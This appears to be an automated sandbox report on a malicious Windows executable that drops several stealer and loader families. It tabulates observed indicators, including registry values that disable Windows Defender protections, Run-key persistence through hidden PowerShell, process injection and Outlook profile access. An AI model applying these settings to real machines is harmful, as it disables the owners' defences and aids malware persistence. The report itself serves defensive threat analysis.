Analysis Overview
SHA256
93f30cc2c3cce9ead96ef63bf4131bde390b560af5248fc4e635a1b43f40d36f
Threat Level: Known bad
The file NEAS.34705ad4de6be36a5fc63e785fb9fc10.exe was found to be: Known bad.
Malicious Activity Summary
RedLine
SectopRAT payload
Amadey
DcRat
Suspicious use of NtCreateUserProcessOtherParentProcess
SmokeLoader
Raccoon Stealer payload
Detect ZGRat V1
ZGRat
RedLine payload
SectopRAT
Modifies Windows Defender Real-time Protection settings
Glupteba
Glupteba payload
Raccoon
Stops running service(s)
Modifies Windows Firewall
Drops file in Drivers directory
Downloads MZ/PE file
Blocklisted process makes network request
Reads user/profile data of web browsers
Windows security modification
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Accesses Microsoft Outlook profiles
Looks up external IP address via web service
Adds Run key to start application
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
Launches sc.exe
Drops file in Program Files directory
Unsigned PE
Program crash
Enumerates physical storage devices
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Enumerates system info in registry
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Suspicious behavior: MapViewOfSection
outlook_win_path
outlook_office_path
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-31 08:52
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-31 08:52
Reported
2023-10-31 10:05
Platform
win10v2004-20231025-en
Max time kernel
84s
Max time network
155s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.34705ad4de6be36a5fc63e785fb9fc10.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5996 created 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5996 created 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5996 created 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5996 created 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5996 created 3304 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1574.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\D2B6.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\EAC5.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\D622.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\D622.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\610.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\610.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FE8D.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\CF3B.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\AC4.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WK2fw02.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\CA74.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Mm7QR3su.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\wf6Qz1np.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jN8to2ao.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zW5cl4xg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\EE11.exe'\"" | C:\Users\Admin\AppData\Local\Temp\EE11.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\NEAS.34705ad4de6be36a5fc63e785fb9fc10.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Detected potential entity reuse from brand paypal.
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1204 set thread context of 752 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1Zw53hP3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 3720 set thread context of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2lB5147.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4608 set thread context of 1868 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3ri89de.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 5108 set thread context of 2024 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Os07TC9.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 6016 set thread context of 5320 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
| PID 5720 set thread context of 7128 | N/A | C:\Users\Admin\AppData\Local\Temp\FE8D.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\LAudioConverter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-5O0OU.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-2HDTN.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-45L6N.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LAudioConverter\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-A8TJ8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-NR385.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-GFRM5.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-3G0F7.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-VJFUR.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\XML\Styles\is-HTG03.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-Q5G92.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-MU26G.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-D1CQT.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\LAudioConverter\LAudioConverter.exe | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-2SQEL.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-B32M3.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\LAudioConverter\is-0GR7O.tmp | C:\Users\Admin\AppData\Local\Temp\is-3A0UD.tmp\LzmwAqmV.tmp | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-442 = "Arabian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
